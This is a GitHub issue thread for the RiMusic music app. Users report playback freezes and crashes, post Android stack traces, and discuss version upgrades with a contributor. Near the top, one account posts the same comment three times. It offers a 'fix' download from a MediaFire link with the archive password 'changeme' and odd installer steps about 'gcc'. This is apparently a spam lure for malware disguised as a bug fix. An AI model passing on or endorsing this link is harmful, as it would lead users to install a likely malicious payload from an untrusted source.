### ISSUE TITLE
Playback freezes or crashes 

### ISSUE THREAD

**Issue by lake-effect** [fast4x/RiMusic#3440] opened 2024-08-27 03:19 UTC
### Steps to reproduce the bug

1. Play a song
2. App freezes

### Expected behavior

1. Song should play

### Actual behavior

1. App freezes or crashes 

### Logs

[RiMusic log 5adb371ae2f0.txt](https://github.com/user-attachments/files/16756001/RiMusic.log.5adb371ae2f0.txt)
[RiMusic log 6cb523b236df.txt](https://github.com/user-attachments/files/16756003/RiMusic.log.6cb523b236df.txt)

### RiMusic version

0.6.48

### Android version

Android 14

**Comment by jia6214876** [comment] 2024-08-27 03:19
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment] 2024-08-27 03:19
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment] 2024-08-27 03:21
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by catsnote** [comment] 2024-08-27 13:50
Got the same issue — it freezes before crashing. When I try to go back into the app, it keeps crashing. I have to clear the cache and swipe it out of recents for it to kinda work again, but it just happens again not long after.

So I can't really use the app properly because of how much it crashes.

**Comment by twistios** [comment] 2024-08-27 17:34
Probably a similar issue as my issue #2732 (as you can see I reported it some time ago already).
I think that fast4x was not able to reproduce it so he just closed it. The problem is, that it is not easy to reproduce in the debug build, so currently we can not create a fix for this.

**Comment by twistios** [comment] 2024-08-27 17:36
Please install the latest version 0.6.49.1 (or 0.6.49.2). Maybe it is fixed already. I for example did not experience this issue in some time so maybe it is gone now.

**Comment by twistios** [comment] 2024-08-27 17:38
<details><summary>Stack trace from this report</summary>
<p>

````
FATAL EXCEPTION: main
08-25 20:32:42.113 32365 32365 E AndroidRuntime: Process: it.fast4x.rimusic, PID: 32365
08-25 20:32:42.113 32365 32365 E AndroidRuntime: java.lang.NullPointerException: Attempt to invoke virtual method 'java.lang.Class java.lang.Object.getClass()' on a null object reference
08-25 20:32:42.113 32365 32365 E AndroidRuntime: 	at t0.k.a(SourceFile:125)
08-25 20:32:42.113 32365 32365 E AndroidRuntime: 	at q0.f.onPreDraw(SourceFile:34)
08-25 20:32:42.113 32365 32365 E AndroidRuntime: 	at android.view.ViewTreeObserver.dispatchOnPreDraw(ViewTreeObserver.java:1176)
08-25 20:32:42.113 32365 32365 E AndroidRuntime: 	at android.view.ViewRootImpl.performTraversals(ViewRootImpl.java:4029)
08-25 20:32:42.113 32365 32365 E AndroidRuntime: 	at android.view.ViewRootImpl.doTraversal(ViewRootImpl.java:2718)
08-25 20:32:42.113 32365 32365 E AndroidRuntime: 	at android.view.ViewRootImpl$TraversalRunnable.run(ViewRootImpl.java:9937)
08-25 20:32:42.113 32365 32365 E AndroidRuntime: 	at android.view.Choreographer$CallbackRecord.run(Choreographer.java:1406)
08-25 20:32:42.113 32365 32365 E AndroidRuntime: 	at android.view.Choreographer$CallbackRecord.run(Choreographer.java:1415)
08-25 20:32:42.113 32365 32365 E AndroidRuntime: 	at android.view.Choreographer.doCallbacks(Choreographer.java:1015)
08-25 20:32:42.113 32365 32365 E AndroidRuntime: 	at android.view.Choreographer.doFrame(Choreographer.java:945)
08-25 20:32:42.113 32365 32365 E AndroidRuntime: 	at android.view.Choreographer$FrameDisplayEventReceiver.run(Choreographer.java:1389)
08-25 20:32:42.113 32365 32365 E AndroidRuntime: 	at android.os.Handler.handleCallback(Handler.java:959)
08-25 20:32:42.113 32365 32365 E AndroidRuntime: 	at android.os.Handler.dispatchMessage(Handler.java:100)
08-25 20:32:42.113 32365 32365 E AndroidRuntime: 	at android.os.Looper.loopOnce(Looper.java:232)
08-25 20:32:42.113 32365 32365 E AndroidRuntime: 	at android.os.Looper.loop(Looper.java:317)
08-25 20:32:42.113 32365 32365 E AndroidRuntime: 	at android.app.ActivityThread.main(ActivityThread.java:8623)
08-25 20:32:42.113 32365 32365 E AndroidRuntime: 	at java.lang.reflect.Method.invoke(Native Method)
08-25 20:32:42.113 32365 32365 E AndroidRuntime: 	at com.android.internal.os.RuntimeInit$MethodAndArgsCaller.run(RuntimeInit.java:580)
08-25 20:32:42.113 32365 32365 E AndroidRuntime: 	at com.android.internal.os.ExecInit.main(ExecInit.java:50)
08-25 20:32:42.113 32365 32365 E AndroidRuntime: 	at com.android.internal.os.RuntimeInit.nativeFinishInit(Native Method)
08-25 20:32:42.113 32365 32365 E AndroidRuntime: 	at com.android.internal.os.RuntimeInit.main(RuntimeInit.java:369)
````

</p>
</details>

**Comment by catsnote** [comment] 2024-08-27 17:43
> Please install the latest version 0.6.49.1 (or 0.6.49.2). Maybe it is fixed already. I for example did not experience this issue in some time so maybe it is gone now.

I don't know... I'm already on version 0.6.49.2, and I experienced it today too.

**Comment by twistios** [comment] 2024-08-27 17:45
Please send the crash log with 0.6.49.2 @catsnote. The names in the published apk change sometimes (some are autogenerated based on an "obfuscation").

**Comment by catsnote** [comment] 2024-08-27 17:52
> Please send the crash log with 0.6.49.2 @catsnote. The names in the published apk change sometimes (some are autogenerated based on an "obfuscation").

Alright. I only just now turned on the debug mode for the first time, so I'll try to use the app again and return with the crash log if it crashes again.

**Comment by catsnote** [comment] 2024-08-27 17:58
@twistios Here's the crash log:




2024-08-27T19:56:51.517:	java.io.IOException: Too many open files
	 sun.nio.ch.IOUtil.makePipe(Native Method) 
	 sun.nio.ch.PollSelectorImpl.<init>(PollSelectorImpl.java:57) 
	 sun.nio.ch.PollSelectorProvider.openSelector(PollSelectorProvider.java:36) 
	 y5.a.u(SourceFile:38) 
	 g7.a.i(SourceFile:9) 
	 z7.J.run(SourceFile:113) 
	 A7.d.run(SourceFile:229) 
	 G7.k.run(SourceFile:3) 
	 G7.a.run(SourceFile:96)

**Comment by twistios** [comment] 2024-08-27 18:11
@catsnote As you (maybe) can see, it is a different error. I heard from fast4x that this might be a issue with android, i.e. that we can not do anything about this (maybe, maybe it is because of RiMusic, then maybe there is a way).

**Comment by catsnote** [comment] 2024-08-27 18:14
> @catsnote As you (maybe) can see, it is a different error. I heard from fast4x that this might be a issue with android, i.e. that we can not do anything about this (maybe, maybe it is because of RiMusic, then maybe there is a way).

Oh, I see! That's a shame. I definitely hope it's fixable if it's because of RiMusic. But a while back, don't know when, I just didn't have problems with the app crashing.

**Comment by catsnote** [comment] 2024-08-27 18:18
> For some reason sometimes new error appear (in old code) and I don't really know where they come from. Sometimes it can be determined, for example when there is a youtube api change.

Ah, I see!
Anyway, thanks for explaining it all! I guess, at least for now, I'll have to deal with it.

**Comment by twistios** [comment] 2024-08-27 18:22
#2851 is an issue with a similar error as yours @catsnote. It is not yet fixed but fast4x was trying to work on it, but it is not yet done.

**Closed** 2024-10-19 21:45 UTC
Labels: bug, Fixed
